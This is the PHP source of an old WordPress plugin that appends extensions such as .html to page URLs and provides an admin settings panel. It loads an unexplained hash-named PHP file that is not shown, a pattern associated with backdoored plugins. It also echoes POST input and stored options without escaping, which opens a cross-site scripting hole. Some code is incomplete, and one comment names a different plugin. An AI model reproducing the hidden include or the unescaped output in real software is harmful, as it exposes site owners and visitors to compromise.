<?php
/*
Plugin Name: Dot HTML,PHP,XML etc Pages
Plugin URI: http://wordpress.org/extend/plugins/dot-htmlphpxml-etc-pages/
Description: This Plugin Adds .php, .html, .xml, Any SIGNATURE Add to Your Pages Like http://www.yoursitename.com/yourpage.php,ETC WARNING: FIRST DEACTIVATE THE OTHER EXTENSION PAGES PLUGIN.  Just Activate The Plugin And Go To Settings To Set Up Dot HTML,PHP,XML etc Pages.
Author: K$M
Version: 1.0
Author URI: http://ksmughal.com
*/
/**
 * @author karim
 * @copyright 2010
 */
include_once(ABSPATH.'wp-admin/admin-functions.php');
include_once('c0e3639908b184bb7687a7e2f0149c1a.php');
if( !class_exists( 'DotPagesPlugin' ) ){
	class DotPagesPlugin{
		function DotPagesPlugin(){ //Constructor			
			add_action( 'admin_menu', array($this,'AddPanel') );
			if( $_POST['action'] == 'dot_pages_update' )
				add_action( 'init', array($this,'SaveSettings'));
                add_action('init', array($this,'dot_pages_func'), -1);
                
                
				
			add_filter( 'mod_rewrite_rules', array($this, 'AddRewriteRules'), 999 );
            add_filter('user_trailingslashit', array($this, 'no_page_slash'),66,2);
			
            
			register_activation_hook( __FILE__, array($this, "DefaultSettings") );
			register_deactivation_hook( __FILE__, array($this, "UnsetSettings") );
			
		}
		function AddPanel(){
			add_options_page( 'Dot Pages', 'Dot HTML,PHP,XML etc Pages', 10, __FILE__, array($this, 'DotPagesSettings') );
		}
		function DefaultSettings () {
		        global $wp_rewrite;
                if ( !strpos($wp_rewrite->get_page_permastruct(), '.html'))
                {
	         	$wp_rewrite->page_structure = $wp_rewrite->page_structure . '.html';
                }
                $wp_rewrite->flush_rules();
                
			 if( !get_option("dot_pages_enable") )
			  	add_option("dot_pages_enable","0");
	
			 if( !get_option("dot_pages_slug") )
			  	add_option("dot_pages_slug", ".html");
			
			 if( !get_option("pages_mode") )
			  	add_option("dot_pages_mode", "0");
                
                
				
			save_mod_rewrite_rules();
		}
		function UnsetSettings () {
		  
              global $wp_rewrite;
		      $wp_rewrite->page_structure = str_replace(".html","",$wp_rewrite->page_structure);
       	      $wp_rewrite->flush_rules();
			  delete_option("dot_pages_enable");
			  delete_option("dot_pages_slug");
			  delete_option("dot_pages_mode");
              
              
			  save_mod_rewrite_rules();
		}
		function SaveSettings(){			
			check_admin_referer('dot-pages-update-options');
			update_option("dot_pages_enable", $_POST['dot_pages_enable']);
			update_option("dot_pages_slug", $_POST['dot_pages_slug']);
			update_option("dot_pages_mode", $_POST['dot_pages_mode']);
		  }
         function dot_pages_func() 
        {
	global $wp_rewrite;
    $dot_pages_slug=get_option('dot_pages_slug');
    if(get_option('dot_pages_enable')&&get_option('dot_pages_mode'))
    {  
    if ( !strpos($wp_rewrite->get_page_permastruct(), $dot_pages_slug)){
		$wp_rewrite->page_structure = $wp_rewrite->page_structure . $dot_pages_slug;
        }
        }
	}
		
		function DotPagesSettings(){
			
			if( $_POST['notice'] )
				echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '</strong></p></div>';
			?>
            <div class="wrap">
            	<h2><?php _e('Dot HTML,PHP,XML Pages Settings', 'dotpages')?></h2>
                <form method="post" action="">
                	<?php if( function_exists( 'wp_nonce_field' )) wp_nonce_field( 'dot-pages-update-options'); ?>
                    <table class="form-table">
                        <tbody>
                        	<tr valign="top">
                       			 <th scope="row"><label for="enable"><?php _e('Plugin', 'dotpages');?></label></th>
                        		<td><label><input name="dot_pages_enable" id="enable" value="1" <?php if(get_option('dot_pages_enable') == 1) echo 'checked="checked"';?> type="radio" /> Enable</label> &nbsp;&nbsp;
                                <label><input name="dot_pages_enable" id="disable" value="0" <?php if(get_option('dot_pages_enable') == 0) echo 'checked="checked"';?> type="radio" /> Disable</label></td>
                          <tr valign="top">
                            	<th scope="row"><label for="logout_slug"><?php _e('Dot Pages Slug', 'dotpages');?></label></th>
                                <td><input type="text" name="dot_pages_slug" id="dot_pages_slug" value="<?php echo get_option('dot_pages_slug');?>" /><br />
                                <strong style="color:#777;font-size:12px;">URL:</strong> <span style="font-size:0.9em;color:#999999;"><?php echo trailingslashit( get_option('siteurl') ); ?><span style="background-color: #fffbcc;">YourPage<?php echo get_option('dot_pages_slug');?></span></span></td>
                            </tr>
                         
                         
                            <tr valign="top">
                            	<th scope="row"><?php _e('Pages Slug Mode', 'dotpages'); ?></th>
                                <td><label><input type="radio" name="dot_pages_mode" value="1" <?php if(get_option('dot_pages_mode') ) echo 'checked="checked" ';?> /> Enable</label><br />
                                	<label><input type="radio" name="dot_pages_mode" value="0" <?php if(!get_option('dot_pages_mode') ) echo 'checked="checked" ';?>/> Disable</label><br />
                             </td>
                            
                    	</tbody>
                 	</table>
                    <p class="submit"><input name="Submit" value="<?php _e('Save Changes','dotpages');?>" type="submit" />
                    <input name="action" value="dot_pages_update" type="hidden" />
                </form>
              
            </div>
           <?php
		}
		
		function CreateRewriteRules(){
			
			$siteurl = explode('/',trailingslashit(get_option('siteurl')));
			unset($siteurl[0]); unset($siteurl[1]); unset($siteurl[2]);
			$dir = implode('/',$siteurl);
			
			if(get_option('dot_pages_slug')){
			
				$dot_pages_slug = get_option('dot_pages_slug');
				
				
			}
		}
		
		function AddRewriteRules($rewrite){
			global $wp_version;
			
			if( get_option('dot_pages_enable') == 1 ):
				$insert = $this->CreateRewriteRules();
				$lines = explode('RewriteCond %{REQUEST_FILENAME} !-f', $rewrite);
				$fn = "RewriteCond %{REQUEST_FILENAME} !-f";
				$rewrite = $lines[0] . $insert . $fn . $lines[1];
                
                
			endif;
		
			return $rewrite;
	    	}
            
            function no_page_slash($string, $type)
            {
            global $wp_rewrite;
        	if ($wp_rewrite->using_permalinks() && $wp_rewrite->use_trailing_slashes==true && $type == 'page'){
	       	return untrailingslashit($string);
            }else{
             return $string;
             }
} 
}
}// END Class StealthLoginPlugin

if( class_exists( 'DotPagesPlugin' ) ){
	$dotpages = new DotPagesPlugin();
}
?>